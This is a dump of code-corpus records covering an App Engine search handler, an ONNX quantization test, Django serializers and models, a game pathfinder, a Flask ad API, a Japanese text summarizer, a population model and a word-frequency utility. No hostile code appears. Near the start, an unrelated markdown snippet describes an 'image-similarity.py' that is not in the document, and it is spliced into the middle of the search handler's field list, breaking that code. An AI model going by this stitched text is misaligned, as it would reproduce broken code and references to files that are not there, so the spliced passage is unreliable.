urlparse(self.request.uri)\n query = ''\n qobj = parse_qs(uri.query).get ('query', None)\n if uri.query:\n query = \"*\" if qobj is None else qobj[0]\n # sort results by author descending\n expr_list = [search.SortExpression(\n expression='author', default_value='',\n direction=search.SortExpression.DESCENDING)]\n \n sort_opts = search.SortOptions(\n expressions=expr_list\n )\n \n query_options = search.QueryOptions(\n limit=3,\n sort_options=sort_opts,\n snippeted_fields=['content'],\n returned_fields=['author', 
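`image-similarity.py` above detects duplicate images by using the full PIL histogram tuple as a dict key. The grouping pattern itself, written with a `defaultdict` and a generic key function (string lengths stand in for histograms here):

```python
from collections import defaultdict

def group_by_key(items, key):
    groups = defaultdict(list)
    for it in items:
        groups[key(it)].append(it)
    # keep only keys shared by more than one item, i.e. the duplicates
    return {k: v for k, v in groups.items() if len(v) > 1}

dupes = group_by_key(["a", "bb", "cc", "ddd"], key=len)
assert dupes == {2: ["bb", "cc"]}
```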
'date']\n )\n \n query_obj = search.Query(query_string=query, options=query_options)\n results = search.Index(name=_INDEX_NAME).search(query=query_obj)\n\n template_values = {\n 'results': results,\n 'number_returned': len(results.results),\n 'url': '/',\n 'url_linktext': 'click here to search again',\n }\n self.render_template('search.html', template_values)\n \n \n \nclass MainPage(BaseHandler):\n def get(self):\n template_values = {\n 'url': '/populate',\n 'url_linktext': 'click here to populate items',\n }\n self.render_template('index.html', template_values)\n \n \n \napplication = webapp2.WSGIApplication([\n (\"/\", MainPage),\n (\"/populate\", Populate),\n (\"/search\", Search)\n], debug=True)\n\n","sub_path":"searchingUnicodeSnippets.py","file_name":"searchingUnicodeSnippets.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"303905506","text":"#!/usr/bin/env python\n# coding: utf-8\n# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nimport unittest\nimport onnx\nimport onnxruntime\nimport numpy as np\nfrom onnx import helper, TensorProto, numpy_helper\nfrom onnxruntime.quantization import quantize_dynamic\nfrom op_test_utils import TestDataFeeds, check_model_correctness, check_op_type_count, check_op_type_order\n\n\ndef generate_input_initializer(tensor_shape, tensor_dtype, input_name):\n '''\n Helper function to generate initializers for test inputs\n '''\n tensor = np.random.normal(0, 0.3, tensor_shape).astype(tensor_dtype)\n init = numpy_helper.from_array(tensor, input_name)\n return init\n\nclass TestONNXModel(unittest.TestCase):\n def construct_model(self, model_path):\n # input\n # / |\n # / |\n # Conv(1) |\n # | |\n # Relu Conv(2)\n # | |\n # \\ /\n # Add\n # |\n # (output)\n initializers = []\n input = helper.make_tensor_value_info('input', TensorProto.FLOAT, [4, 2, 8, 8])\n output = helper.make_tensor_value_info('output', TensorProto.FLOAT, [4, 2, 8, 8])\n\n initializers.append(generate_input_initializer([2, 2, 1, 1], np.float32, 'W1'))\n initializers.append(generate_input_initializer([2, 2, 1, 1], np.float32, 'W2'))\n initializers.append(generate_input_initializer([2], np.float32, 'B'))\n conv_node_1 = onnx.helper.make_node('Conv', ['input', 'W1', 'B'], ['Conv1_O'], name='Conv1')\n conv_node_2 = onnx.helper.make_node('Conv', ['input', 'W2', 'B'], ['Conv2_O'], name='Conv2')\n relu_node = onnx.helper.make_node('Relu', ['Conv1_O'], ['Relu_O'], name='Relu')\n add_node = onnx.helper.make_node('Add', ['Relu_O', 'Conv2_O'], ['output'], name='Add')\n graph = helper.make_graph([conv_node_1, relu_node, conv_node_2, add_node],\n 'onnx_model_test', [input], [output], initializer=initializers)\n model = helper.make_model(graph, opset_imports=[helper.make_opsetid(\"\", 13)])\n onnx.save(model, model_path)\n\n def dynamic_quant_conv(self, model_fp32_path, model_int8_path):\n quantize_dynamic(model_fp32_path, model_int8_path)\n quant_nodes = {'ConvInteger' : 2}\n check_op_type_count(self, model_int8_path, **quant_nodes)\n check_model_correctness(self, model_fp32_path, model_int8_path, {'input': np.random.rand(4, 2, 8, 8).astype(np.float32)})\n\n def test_quant_conv(self):\n np.random.seed(1)\n model_fp32_path = 
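`Search.get` above pulls `?query=` out of the request URI and falls back to `"*"` when the parameter is absent. The same extraction on Python 3, where `parse_qs` lives in `urllib.parse` (the `cgi` alias imported above has long been deprecated):

```python
from urllib.parse import parse_qs, urlparse

def extract_query(uri):
    parts = urlparse(uri)
    if not parts.query:            # no query string at all: keep ''
        return ""
    vals = parse_qs(parts.query).get("query")
    return "*" if vals is None else vals[0]

assert extract_query("http://x/search?query=books") == "books"
assert extract_query("http://x/search?page=2") == "*"
```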
'conv_bias.fp32.onnx'\n model_int8_path = 'conv_bias.quant.onnx'\n self.construct_model(model_fp32_path)\n\n self.dynamic_quant_conv(model_fp32_path, model_int8_path)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"onnxruntime/test/python/quantization/test_conv_dynamic.py","file_name":"test_conv_dynamic.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"606926765","text":"from .models import RegistroGpsMovil \nfrom rest_framework import serializers\n\n\nclass RegistroGpsMovilSerializer(serializers.HyperlinkedModelSerializer):\n #coordenadas = serializers.PrimaryKeyRelatedField(many=True, queryset=RegistroGpsMovil.objects.all())\n\n class Meta:\n model = RegistroGpsMovil\n fields = (\n 'latitud', \n 'longitud',\n 'accuray',\n 'altitude',\n 'speed',\n 'speed_accuracy',\n 'marca_phone',\n 'sist_operativo',\n 'version',\n 'imei',\n 'mac_adress',\n 'ip_adress',\n )\n\n\n","sub_path":"servidorAPI/apiFlutter/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"521689209","text":"import bisect, math\nfrom panda3d.core import *\n\nclass InvasionPathfinderAI:\n VERTEX_EXTRUSION = 0.15\n\n def __init__(self, polygons=None):\n self.borders = []\n self.vertices = []\n if polygons:\n for polygon in polygons:\n self.addPolygon(polygon)\n\n self.buildNeighbors()\n\n def addPolygon(self, points):\n newVertices = []\n for i, point in enumerate(points):\n prevPoint = points[(i - 1)]\n x, y = point\n x2, y2 = prevPoint\n self.borders.append((x2, y2, x, y))\n vertex = AStarVertex(Point2(x, y))\n self.vertices.append(vertex)\n newVertices.append(vertex)\n\n for i, vertex in enumerate(newVertices):\n prevVertex = newVertices[(i - 1)]\n nextVertex = newVertices[((i + 1) % len(newVertices))]\n vertex.setPolygonalNeighbors(prevVertex, nextVertex)\n vertex.extrudeVertex(self.VERTEX_EXTRUSION)\n if vertex.interiorAngle > 180:\n self.vertices.remove(vertex)\n\n def buildNeighbors(self):\n for vertex in self.vertices:\n vertex.resetNeighbors()\n\n for i, v1 in enumerate(self.vertices):\n for v2 in self.vertices[i + 1:]:\n self._considerLink(v1, v2)\n\n def planPath(self, fromPoint, toPoint, closeEnough=0):\n x1, y1 = fromPoint\n x2, y2 = toPoint\n if not self._testLineIntersections((x1, y1, x2, y2), self.borders):\n return [\n toPoint]\n fromVertex = AStarVertex(Point2(x1, y1))\n toVertex = AStarVertex(Point2(x2, y2))\n for vertex in self.vertices:\n self._considerLink(vertex, fromVertex)\n self._considerLink(vertex, toVertex)\n\n tempVertices = [fromVertex, toVertex]\n isApproximate = False\n try:\n if not toVertex.getNeighbors():\n if closeEnough is 0:\n return\n isApproximate = True\n closeEnoughSquared = closeEnough * closeEnough\n for border in self.borders:\n projected = self._projectPointToLine(toVertex.pos, border)\n if projected is None:\n continue\n if (projected - toVertex.pos).lengthSquared() > closeEnoughSquared:\n continue\n projectionDirection = projected - toVertex.pos\n projectionDirection.normalize()\n projected += projectionDirection * self.VERTEX_EXTRUSION\n projectedVertex = AStarVertex(projected)\n projectedVertex.link(toVertex)\n self._considerLink(fromVertex, projectedVertex)\n for vertex in self.vertices:\n self._considerLink(vertex, projectedVertex, False)\n\n tempVertices.append(projectedVertex)\n\n astar = AStarSearch()\n result = 
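The quantization test above asserts `{'ConvInteger': 2}` through the project's `check_op_type_count` helper. A from-scratch op-type census using only the `onnx` package, in case that helper is unavailable; the path matches the file the test writes:

```python
from collections import Counter

import onnx

def op_type_counts(model_path):
    model = onnx.load(model_path)
    return Counter(node.op_type for node in model.graph.node)

# after running the test above:
# assert op_type_counts("conv_bias.quant.onnx")["ConvInteger"] == 2
```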
astar.search(fromVertex, toVertex)\n if result:\n if isApproximate:\n result.pop(-1)\n return [ vertex.pos for vertex in result ]\n return\n finally:\n for tempVertex in tempVertices:\n tempVertex.unlinkAll()\n\n return\n\n def _considerLink(self, v1, v2, testAngles=True):\n if v1.isVertexPolygonalNeighbor(v2):\n v1.link(v2)\n return\n if testAngles:\n if v1.isVertexInsideAngle(v2) or v2.isVertexInsideAngle(v1):\n return\n if v1.isVertexInsideOpposite(v2) or v2.isVertexInsideOpposite(v1):\n return\n x1, y1 = v1.pos\n x2, y2 = v2.pos\n if self._testLineIntersections((x1, y1, x2, y2), self.borders):\n return\n v1.link(v2)\n\n def _makeLineMat(self, x1, y1, x2, y2):\n mat = Mat3(y2 - y1, x1 - x2, 0, x2 - x1, y2 - y1, 0, x1, y1, 1)\n if not mat.invertInPlace():\n return None\n return mat\n\n def _testLineIntersections(self, incident, lines):\n x1, y1, x2, y2 = incident\n mat = self._makeLineMat(x1, y1, x2, y2)\n if not mat:\n return False\n for x1, y1, x2, y2 in lines:\n x1, y1, _ = mat.xform(Point3(x1, y1, 1))\n x2, y2, _ = mat.xform(Point3(x2, y2, 1))\n if not (x1 < 0 and x2 > 0 or x1 > 0 and x2 < 0):\n continue\n m = (y2 - y1) / (x2 - x1)\n b = m * -x1 + y1\n epsilon = 0.001\n if 0.0 + epsilon < b < 1.0 - epsilon:\n return True\n\n return False\n\n def _projectPointToLine(self, point, line):\n x1, y1, x2, y2 = line\n x, y = point\n origin = Point2(x1, y1)\n vecLine = Point2(x2, y2) - origin\n vecPoint = Point2(x, y) - origin\n projectedPoint = vecPoint.project(vecLine)\n if projectedPoint.lengthSquared() > vecLine.lengthSquared():\n return None\n if projectedPoint.dot(vecLine) < 0:\n return None\n return origin + projectedPoint\n\n\nclass AStarVertex:\n\n def __init__(self, pos):\n self.pos = pos\n self.neighbors = []\n self.prevPolyNeighbor = None\n self.nextPolyNeighbor = None\n self.interiorAngle = None\n self.extrudeVector = None\n return\n\n def link(self, neighbor):\n self.__addNeighbor(neighbor)\n neighbor.__addNeighbor(self)\n\n def unlink(self, neighbor):\n self.__removeNeighbor(neighbor)\n neighbor.__removeNeighbor(self)\n\n def unlinkAll(self):\n neighbors = list(self.neighbors)\n for neighbor in neighbors:\n self.unlink(neighbor)\n\n def resetNeighbors(self):\n self.neighbors = []\n\n def __addNeighbor(self, neighbor):\n if neighbor not in self.neighbors:\n self.neighbors.append(neighbor)\n\n def __removeNeighbor(self, neighbor):\n if neighbor in self.neighbors:\n self.neighbors.remove(neighbor)\n\n def setPolygonalNeighbors(self, prev, next):\n vecToPrev = prev.pos - self.pos\n vecToNext = next.pos - self.pos\n angle = vecToPrev.signedAngleDeg(vecToNext)\n angle %= 360\n self.prevPolyNeighbor = prev\n self.nextPolyNeighbor = next\n self.interiorAngle = angle\n prevAngle = Vec2(1, 0).signedAngleDeg(vecToPrev)\n extrudeAngle = prevAngle + self.interiorAngle / 2.0 + 180\n extrudeAngle *= math.pi / 180\n self.extrudeVector = Vec2(math.cos(extrudeAngle), math.sin(extrudeAngle))\n\n def isVertexInsideAngle(self, other):\n if self.prevPolyNeighbor is None or self.interiorAngle is None:\n return False\n vecToPrev = self.prevPolyNeighbor.pos - self.pos\n vecToOther = other.pos - self.pos\n angle = vecToPrev.signedAngleDeg(vecToOther)\n angle %= 360\n return angle < self.interiorAngle\n\n def isVertexInsideOpposite(self, other):\n if self.prevPolyNeighbor is None or self.interiorAngle is None:\n return False\n vecToPrev = self.prevPolyNeighbor.pos - self.pos\n vecToOther = other.pos - self.pos\n angle = vecToPrev.signedAngleDeg(vecToOther)\n angle -= 180\n angle %= 360\n return angle < 
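`_projectPointToLine` above projects a point onto a border segment and rejects projections past either endpoint. (The same class also compares `closeEnough is 0`; identity tests against integer literals only work by accident of CPython's caching and warn on 3.8+, so `== 0` is the safe spelling.) The projection math with plain tuples instead of panda3d vectors:

```python
def project(point, a, b):
    ax, ay = a; bx, by = b; px, py = point
    vx, vy = bx - ax, by - ay            # segment direction
    wx, wy = px - ax, py - ay
    seg_len2 = vx * vx + vy * vy
    t = (wx * vx + wy * vy) / seg_len2   # scalar projection onto the segment
    if t < 0 or t > 1:                   # falls off either end
        return None
    return (ax + t * vx, ay + t * vy)

assert project((1, 1), (0, 0), (2, 0)) == (1.0, 0.0)
assert project((3, 1), (0, 0), (2, 0)) is None
```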
self.interiorAngle\n\n def extrudeVertex(self, distance):\n if self.extrudeVector is None:\n return\n self.pos += self.extrudeVector * distance\n return\n\n def isVertexPolygonalNeighbor(self, other):\n return other in (self.prevPolyNeighbor, self.nextPolyNeighbor)\n\n def getNeighbors(self):\n return self.neighbors\n\n def getHeuristicTo(self, other):\n return (self.pos - other.pos).length()\n\n def getCostTo(self, other):\n return (self.pos - other.pos).length()\n\n\nclass AStarSearch:\n\n def __init__(self):\n self.openList = []\n self.closed = set()\n self.paths = {}\n self._toVertex = None\n return\n\n def search(self, fromVertex, toVertex):\n self.openList = [\n AStarPath(None, fromVertex, 0, 0)]\n self.closed = set()\n self.paths = {}\n self._toVertex = toVertex\n while self.openList and toVertex not in self.paths:\n self.__doIteration()\n\n path = self.paths.get(toVertex)\n if not path:\n return\n return self.__getVerticesToPath(path)\n\n def __doIteration(self):\n path = self.openList.pop(0)\n vertex = path.vertex\n self.closed.add(vertex)\n neighbors = vertex.getNeighbors()\n for neighbor in neighbors:\n if neighbor in self.closed:\n continue\n cost = vertex.getCostTo(neighbor) + path.totalCost\n if neighbor in self.paths:\n neighborPath = self.paths[neighbor]\n if cost < neighborPath.totalCost:\n self.openList.remove(neighborPath)\n del self.paths[neighbor]\n else:\n continue\n newPath = AStarPath(path, neighbor, cost, neighbor.getHeuristicTo(self._toVertex))\n self.paths[neighbor] = newPath\n bisect.insort(self.openList, newPath)\n\n def __getVerticesToPath(self, path):\n result = []\n while path is not None:\n result.insert(0, path.vertex)\n path = path.parent\n\n return result\n\n\nclass AStarPath:\n\n def __init__(self, parent, vertex, cost, heuristic):\n self.parent = parent\n self.vertex = vertex\n self.heuristic = heuristic\n self.totalCost = cost\n\n def __cmp__(self, other):\n return cmp(self.totalCost + self.heuristic, other.totalCost + other.heuristic)","sub_path":"v2.5.7/toontown/election/InvasionPathfinderAI.py","file_name":"InvasionPathfinderAI.py","file_ext":"py","file_size_in_byte":9756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"102642966","text":"from flask import Flask, request, jsonify\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\nfrom adzerk.api import Api as AdZerk\nfrom app.client import Client\nfrom app.exceptions.missing_param import MissingParam\nfrom app.exceptions.invalid_content_type import InvalidContentType\nfrom app.exceptions.invalid_param import InvalidParam\nfrom app.validation import is_valid_pocket_id\nfrom provider.geo_provider import GeolocationProvider\n\n\ndef create_app():\n\n app = Flask(__name__)\n # Indicate that we have two proxy servers in front of the App (Docker gateway and load balancer).\n app.wsgi_app = ProxyFix(app.wsgi_app, x_for=2)\n provider = GeolocationProvider()\n\n @app.route('/spocs', methods=['POST'])\n def get_spocs():\n required_params = set(['version', 'consumer_key', 'pocket_id'])\n optional_params = set(['site', 'placements'])\n req_params = __get_request_params()\n return call(req_params, required_params, optional_params=optional_params)\n\n @app.route('/user', methods=['DELETE'])\n def delete_user():\n pocket_id = request.json['pocket_id']\n adzerk_api = AdZerk(pocket_id=pocket_id)\n response = adzerk_api.delete_user()\n\n return jsonify({'status': int(response.status_code == 200)}), response.status_code\n\n @app.route('/pulse')\n def 
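`AStarSearch` above keeps its open list ordered with `bisect.insort`, which depends on `AStarPath.__cmp__`, a hook that exists only on Python 2. On Python 3 the idiomatic open list is a heap keyed by f = g + h, with a counter as tie-breaker so payload objects are never compared directly:

```python
import heapq
import itertools

counter = itertools.count()
open_list = []
for f, name in [(7.0, "A"), (5.5, "B"), (6.0, "C")]:
    heapq.heappush(open_list, (f, next(counter), name))   # (g + h, tie, node)

assert heapq.heappop(open_list)[2] == "B"                 # lowest f first
```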
pulse():\n return jsonify({'pulse': 'ok'})\n\n @app.errorhandler(MissingParam)\n @app.errorhandler(InvalidParam)\n @app.errorhandler(InvalidContentType)\n def handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n def call(req_params, required_params, optional_params=None):\n # first validate required parameters\n params = {k: v for k, v in req_params.items() if k in required_params}\n __validate_required_params(required_params, params)\n\n # then identify unknown parameters\n all_params = set([k for k in req_params.keys()])\n unknown_params = all_params - (optional_params | required_params) # given params minus union of allowed\n if len(unknown_params) > 0:\n raise InvalidParam('Unrecognized parameters: {0}'.format(unknown_params))\n\n # finally add optional parameters to required parameters\n other_params = {k: v for k, v in req_params.items() if k in optional_params}\n\n # do some additional checking for placements\n if 'placements' in other_params:\n __validate_placements(other_params['placements'])\n params.update(other_params)\n\n client = Client(ip=request.remote_addr, geolocation_provider=provider, **params)\n\n return jsonify(client.get_spocs())\n\n def __validate_required_params(required, params):\n missing = required - params.keys()\n if missing:\n raise MissingParam('Missing required argument(s): {0}'.format(', '.join(missing)))\n\n if not is_valid_pocket_id(params['pocket_id']):\n raise InvalidParam('Invalid pocket_id')\n\n def __validate_placements(placements):\n if not placements or len(placements) == 0:\n return\n required_params = ['name']\n optional_params = ['zone_ids', 'ad_types', 'count']\n list_params = ['ad_types', 'zone_ids']\n for p in placements:\n __validate_single_placement(p, required_params, optional_params, list_params)\n\n def __validate_single_placement(placement, required, optional, list_params):\n for r in required:\n if r not in placement:\n raise MissingParam('Missing required parameter {0} in placement field'.format(r))\n for f in placement.keys():\n if f not in required and f not in optional:\n raise InvalidParam('{0} is an unknown placement parameter'.format(f))\n for l in list_params:\n if l in placement and type(placement[l]) is not list:\n raise InvalidParam('{0} must be a list of values in placement field'.format(l))\n\n def __get_request_params():\n \"\"\"\n Copies request params into a mutable dictionary\n so that we can put in a default value for site if not present.\n Default value is None so that we can grab it from\n hardcoded conf.\n :return:\n \"\"\"\n if request.json is None:\n raise InvalidContentType('Expecting application/json body')\n\n req_params = dict()\n for k, v in request.json.items():\n req_params.update({k: v})\n for k, v in request.args.items():\n if k == 'site':\n req_params.update({'site': v})\n if 'site' not in req_params:\n req_params.update({'site': None})\n if 'placements' not in req_params:\n req_params.update({'placements': None})\n\n return req_params\n\n return app\n\n\nif __name__ == \"__main__\":\n app = create_app()\n app.run(port=8000)\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"318505327","text":"# coding:utf-8\nimport MeCab\n\nparse = MeCab.Tagger(\"-d /usr/local/lib/mecab/dic/mecab-ipadic-neologd/\")\n\ndef input_document():\n sentence_list = []\n sentence_index = {}\n index = 0\n 
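The Flask endpoint above validates required, optional, and unknown parameters with set algebra over the request keys. The check reduced to a standalone function, outside Flask:

```python
def validate(params, required, optional):
    missing = required - params.keys()
    if missing:
        raise ValueError(f"missing: {sorted(missing)}")
    unknown = params.keys() - (required | optional)
    if unknown:
        raise ValueError(f"unknown: {sorted(unknown)}")

# passes silently: all required present, no unknown keys
validate({"version": 2, "pocket_id": "x"}, {"version", "pocket_id"}, {"site"})
```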
with open(\"sample2.txt\") as f:\n for line in f:\n parse = line.split(\"。\")\n for sentence in parse:\n if sentence != \"\\n\":\n sentence_list.append(sentence)\n sentence_index[sentence] = index\n index += 1\n # print(sentence_list)\n return sentence_list, sentence_index\n\ndef word_counting(sentence_list):\n\n word_count = {}\n total = 0\n\n for sentence in sentence_list:\n result = parse.parseToNode(sentence)\n while result:\n feat = result.feature.split(\",\")\n if feat[0] != \"記号\" and feat[0] != \"BOS/EOS\":\n # if feat[0] == \"名詞\" or feat[0] == \"形容詞\" or feat[0] == \"動詞\":\n # print(result.feature)\n # print(result.feature.split(\",\")[6])\n total += 1\n if feat[6] not in word_count:\n word_count[feat[6]] = 0\n word_count[feat[6]] += 1\n result = result.next\n # print(word_count)\n return word_count\n\ndef scoring(sentence_list, word_count, sentence_index):\n sentence_score = {}\n index = 0\n for sentence in sentence_list:\n sentence_word = {}\n result = parse.parseToNode(sentence)\n while result:\n feat = result.feature.split(\",\")\n if feat[0] != \"記号\" and feat[0] != \"BOS/EOS\":\n # if feat[0] == \"名詞\" or feat[0] == \"形容詞\" or feat[0] == \"動詞\":\n if feat[6] not in sentence_word:\n sentence_word[feat[6]] = 0\n sentence_word[feat[6]] += 1\n result = result.next\n sentence_score[sentence] = tf_idf(word_count, sentence_word, len(sentence_list))\n if index == 0:\n sentence_score[sentence] += 5.\n index += 1\n lim = 0\n sentence_oder = {}\n for sentence, score in sorted(sentence_score.items(), key=lambda x: x[1], reverse=True):\n # print(sentence)\n # print(score)\n sentence_oder[sentence] = sentence_index[sentence]\n lim += 1\n if lim == 5:\n break\n for sentence, oder in sorted(sentence_oder.items(), key=lambda x: x[1]):\n print(sentence)\n\ndef tf_idf(word_count, sentence_word, sentence_total):\n import math\n score = 0.\n for word, freq in sentence_word.items():\n # tf = freq / len(sentence_word)\n tf = freq * 0.1\n idf = math.log(sentence_total/word_count[word]) + 1.\n score += tf / idf\n return score\n\n\nif __name__==\"__main__\":\n\n sentence_list, sentence_index = input_document()\n print(sentence_list[0])\n sentence_list = sentence_list[1:]\n word_count = word_counting(sentence_list)\n scoring(sentence_list, word_count, sentence_index)\n","sub_path":"text-wrapping/auto_wrapping.py","file_name":"auto_wrapping.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"617362624","text":"#!/usr/bin/env python3\n# Date: 3rd December 2019\n\n\"\"\"Script ploting output of discrete-time version of Lokta-Volterra model\"\"\"\n\n__appname__ = 'LV3.py'\n__author__ = 'Amy Solman (amy.solman19@imperial.ac.uk)'\n__version__ = '0.0.1'\n\nimport scipy as sc\n\nimport matplotlib.pylab as p\n\nimport numpy as np \n\n\nr = 1 #growth rate of resource pop\na = 0.1 #search rate for resource\nz = 1.5 #mortality rate\ne = 0.75 #consumers efficiency converting resource to consumer biomass\nR0 = 10 #starting resource pop\nC0 = 5 #starting consumer pop\nK = 30\n\n#Define time vector from point 0 to 30 using 10 subdivisions\ntimeseries = list(sc.linspace(0, 15, 1000))\nrows = len(timeseries)\n\nRC = np.zeros([rows,2]) #create numpy array of zeros \nRC[:1] = sc.array([R0, C0]) #fill the first row of the array with the starting pops\n\n#Discrete-time version of the LV model\n\nfor t in range(0, len(timeseries) - 1):\n RC[t+1][0] = RC[t][0] * (1 + (r * (1 - RC[t][0] / K)) - a * RC[t][1]) #fill first column 
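The `tf_idf` helper above accumulates `tf / idf`, which down-weights rare words, the opposite of the textbook product; whether that inversion is deliberate for this summarizer is unclear from the code. The conventional form, for comparison:

```python
import math

def tf_idf(term_freq, doc_freq, n_docs):
    tf = term_freq                          # raw count (many variants exist)
    idf = math.log(n_docs / doc_freq) + 1.0 # same idf as the helper above
    return tf * idf                         # multiply, rather than divide

assert tf_idf(2, 1, 10) > tf_idf(2, 10, 10)   # rarer term scores higher
```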
of the next row with the new R pop\n RC[t+1][1] = RC[t][1] * (1 - z + e * a * RC[t][0]) #fill first column of the next row with the new C pop\n\nf1 = p.figure()\np.plot(timeseries, RC[:,0], 'g-', label='Resource density') #Plot\np.plot(timeseries, RC[:,1], 'b-', label = 'Consumer density')\np.grid()\np.legend(loc='best')\np.xlabel('Time')\np.ylabel('Population density')\np.title('Consumer-Resource population dynamics \\n r = 1, a = 0.1, z = 1.5, e = 0.75')\n\n#Finally, save the figure as a pdf:\n\nf1.savefig('../results/LV3_model1.pdf') #save figure\n\nf2 = p.figure()\np.plot(RC[:,0], RC[:,1], 'r-')\np.grid()\np.xlabel('Resource density')\np.ylabel('Consumer density')\np.title('Consumer-Resource population dynamics \\n r = 1, a = 0.1, z = 1.5, e = 0.75')\n\nf2.savefig('../results/LV3_model2.pdf')\n\n","sub_path":"Week7/Code/LV3.py","file_name":"LV3.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"633562335","text":"from django.db import models\nfrom django.dispatch import Signal\nfrom django.contrib.auth.models import AbstractUser\nfrom django_extensions.db.fields import AutoSlugField\nfrom .validators import phone_number_validator\nfrom .validators import date_of_birth_validator\nfrom .validators import username_validator\nfrom .utilities import get_timestamp_path\nfrom .utilities import send_activation_notification\nfrom .utilities import slugify_function\nimport re\n\nuser_registrated = Signal(providing_args=['instance'])\n\n\ndef user_registrated_dispatcher(sender, **kwargs):\n send_activation_notification(kwargs['instance'])\n\n\nuser_registrated.connect(user_registrated_dispatcher)\n\n\nclass AdvancedUser(AbstractUser):\n slug = AutoSlugField(populate_from='username')\n user_image = models.ImageField(\n blank=True,\n upload_to=get_timestamp_path,\n verbose_name='Фотография пользователя')\n username = models.CharField(\n max_length=24,\n unique=True,\n help_text=('Вимоги: від шести до двадцяти чотирьох символів (6-24). '\n 'Букви латинського алфавіту, цифри та символ _'),\n validators=[username_validator],\n error_messages={\n 'unique': \"Користувач з таким іменем уже був зареєстрований раніше.\",\n },\n verbose_name='Нікнейм'\n )\n email = models.EmailField(\n unique=True,\n verbose_name='Email адреса'\n )\n phone_number = models.CharField(\n max_length=16,\n unique=True,\n null=True,\n blank=True,\n validators=[phone_number_validator],\n verbose_name='Номер телефона'\n )\n village = models.ForeignKey(\n to='VillagesOfBershad',\n null=True,\n blank=True,\n on_delete=models.PROTECT,\n verbose_name='Місто/село'\n )\n date_of_birth = models.CharField(\n max_length=32,\n null=True,\n blank=True,\n validators=[date_of_birth_validator],\n verbose_name='Дата народження',\n )\n is_activated = models.BooleanField(\n default=False,\n verbose_name='Профіль активований через ел.пошту',\n help_text='Параметр стає активним, коли користувач підтвердить свою електронну адресу.'\n )\n about_me = models.TextField(\n null=True,\n max_length=512,\n verbose_name='Про себе',\n help_text='Інформація про вас. 
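The discrete-time consumer-resource update in `LV3.py` above, factored into a single step function with the same parameter meanings (r growth rate, a attack rate, z mortality, e conversion efficiency, K carrying capacity):

```python
def step(R, C, r=1.0, a=0.1, z=1.5, e=0.75, K=30.0):
    R_next = R * (1 + r * (1 - R / K) - a * C)   # resource update
    C_next = C * (1 - z + e * a * R)             # consumer update
    return R_next, C_next

R, C = 10.0, 5.0
for _ in range(5):
    R, C = step(R, C)
print(round(R, 3), round(C, 3))
```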
Інші користувачі зможуть дізнатись про вас більше.'\n )\n\n\nclass ChangesInUserInformation(models.Model):\n \"\"\"\n Temporarily saving new user data, before changing basic information.\n The entry will be deleted after the user confirms the action via email.\n \"\"\"\n user = models.OneToOneField(AdvancedUser, on_delete=models.CASCADE)\n new_first_name = models.CharField(max_length=150, blank=True, null=True, verbose_name=\"Нове ім'я\")\n new_last_name = models.CharField(max_length=150, blank=True, null=True, verbose_name=\"Нова фамілія\")\n new_email = models.EmailField(verbose_name='Нова ел.пошта')\n new_phone_number = models.CharField(\n max_length=16,\n null=True,\n validators=[phone_number_validator],\n verbose_name='Номер телефона',\n )\n\n\nclass VillagesOfBershad(models.Model):\n name = models.CharField(\n max_length=64,\n )\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Населений пункт'\n verbose_name_plural = 'Населені пункти'\n\n\nclass Article(models.Model):\n slug = AutoSlugField(\n populate_from='title',\n db_index=True,\n slugify_function=slugify_function\n )\n author = models.ForeignKey(\n AdvancedUser,\n on_delete=models.CASCADE,\n verbose_name='Автор'\n )\n title = models.CharField(\n max_length=128,\n unique=True,\n verbose_name='Заголовок'\n )\n content = models.TextField(\n max_length=2500,\n verbose_name='Стаття'\n )\n published = models.DateTimeField(\n auto_now_add=True,\n db_index=True,\n verbose_name='Дата публікації'\n )\n category = models.ForeignKey(\n to='Category',\n default=None,\n on_delete=models.PROTECT,\n db_index=True,\n verbose_name='Категорія'\n )\n\n class Meta:\n ordering = ['-published']\n verbose_name = 'Стаття'\n verbose_name_plural = 'Статті'\n\n def __str__(self):\n return self.title\n\n\nclass Category(models.Model):\n parent = models.ForeignKey(\n 'self',\n null=True,\n blank=True,\n related_name='child_category',\n on_delete=models.PROTECT\n )\n title = models.CharField(max_length=50, verbose_name='Назва')\n slug = AutoSlugField(populate_from='title', slugify_function=slugify_function)\n\n def __str__(self):\n name = f'{self.parent}/{self.title}'\n return re.sub('None/', '', name)\n\n class Meta:\n verbose_name = 'Категорія'\n verbose_name_plural = 'Категорії'\n ordering = ['title']\n\n\n\n\n","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"144855279","text":"import re\nfrom collections import defaultdict\n\nimport advertools as adv\nimport pandas as pd\n\nfrom advertools.word_tokenize import word_tokenize\n\n\ndef word_frequency(text_list, num_list=None, phrase_len=1, regex=None,\n rm_words=adv.stopwords['english'], extra_info=False):\n \"\"\"Count the absolute as well as the weighted frequency of words\n in ``text_list`` (based on ``num_list``).\n\n :param text_list: iterable of strings.\n Typically short phrases, but could be any list of full blown documents.\n Usually, you would use this to analyze tweets, book titles, URLs, etc.\n :param num_list: iterable of numbers.\n A list of numbers with the same length as ``text_list``, describing a\n certain attribute of 